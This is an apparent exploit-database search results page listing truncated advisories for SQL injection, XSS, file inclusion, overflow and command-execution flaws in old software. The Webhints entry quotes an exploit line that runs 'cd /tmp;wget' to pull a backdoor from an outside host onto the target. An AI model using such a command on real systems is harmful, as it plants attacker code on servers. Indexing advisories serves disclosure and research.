2326 matches found
Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
No description provided by source. This exploit uses a backdoor that isn't located on this server. $cmde = cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt; change for your own needs. /str0ke #!/usr/bin/perl Trap-Set Underground Hacking Team EXPLOIT FOR: WebHints Remot...
HiFriend 'cgi-bin/hifriend.pl' Open Email Relay Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30320/info HiFriend is prone to an open-email-relay vulnerability. An attacker could exploit this issue by constructing a script that would send unsolicited bulk email to an unrestricted amount of email addresses with a...
Cisco Aironet AP1x00 Malformed HTTP GET Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8290/info Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload. #!/usr/bin/perl Cisco Global...
Nuked-Klan 1.7 Links Module link_id Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/15181/info Nuked Klan is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. These vulnerabilities...
mcGuestbook 1.3 admin.php lang Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote file...
Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28247/info Virtual Support Office XP VSO-XP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/3308/info Hassan Consulting's Shopping Cart is commercial web store software. Shopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a...
myBloggie 2.1.5 login.php PATH_INFO Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/22097/info MyBloggie is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...
PHP-Nuke Johannes Hass 'gaestebuch' 2.2 Module - 'id' Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28063/info The 'gaestebuch' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
Slackware Linux <= 3.5 /etc/group missing results in root access Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/155/info Due to the way /bin/login behaves when a /etc/group file is not present under Slackware's version of the password shadowing suite, users who log in while this file is not present will be given uid and gid 0. This...
NooMS 1.1 - smileys.php page_id Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/31131/info NooMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browse...
Joe Text Editor 2.8 .joerc Arbitrary Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2437/info Joe is a text editor originally written by Joseph Allen. Joe offers a user-friendly interface, with key binding and configuration familiar to many users of Microsoft Word Processing tools. A problem in the...
MusicBox 2.3.4 Page Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/19129/info MusicBox is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful attack could allow an attacker to compromise the...
Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2935/info The 'whodo' utility shipped with Sun Microsystems' Solaris provides a listing of users online and their activities. It is installed setuid root because it reads from the 'utmp' log as well as from the process...
Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8873/info A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts...
MWChat 6.8 Chat.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/15198/info MWChat is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could resul...
Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS
No description provided by source. source: http://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script...
CitrusDB 0.3.6 - Remote Authentication Bypass Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/12560/info CitrusDB is reportedly affected by an authentication bypass vulnerability. This issue is due to the application using a static value during the creation of user cookie information. An attacker could exploit thi...
SleeperChat 0.3f Index.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16363/info SleeperChat is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
FunkBoard 0.66 editpost.php Multiple Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues t...